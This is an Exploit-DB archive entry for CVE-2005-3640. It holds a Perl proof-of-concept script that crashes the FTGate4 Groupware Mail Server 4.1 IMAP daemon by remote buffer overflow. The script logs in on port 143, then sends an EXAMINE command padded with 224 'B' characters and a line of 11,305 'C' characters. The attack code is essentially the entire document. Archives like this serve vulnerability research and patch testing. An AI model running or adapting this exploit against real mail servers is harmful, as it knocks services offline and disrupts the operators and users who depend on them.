FTGate4 Groupware Mail Server 4.1 imapd Remote Buffer Overflow PoC

2005-11-16T00:00:00
ID EDB-ID:1327
Type exploitdb
Reporter Luca Ercoli
Modified 2005-11-16T00:00:00

Description

FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC. CVE-2005-3640. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl

use IO::Socket;

print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n";
print "http://www.lucaercoli.it\n\n\n";

$host = "localhost";

$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "143",
);

unless ($remote) { die "Can't connect to $host" }

print "[!] Connected\n";
print "[?] Exploiting...\n";

sleep(1);

my $imapd = join ("", "1 login user pass", "\r\n");

print $remote $imapd;

sleep(1);
my $imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n");
print $remote $imapd;
sleep(1);
my $imapd = join ("","C"x(11305), "\r\n");
print $remote $imapd;

print "\n[!] Done\n\n\n";

close $remote;

# milw0rm.com [2005-11-16]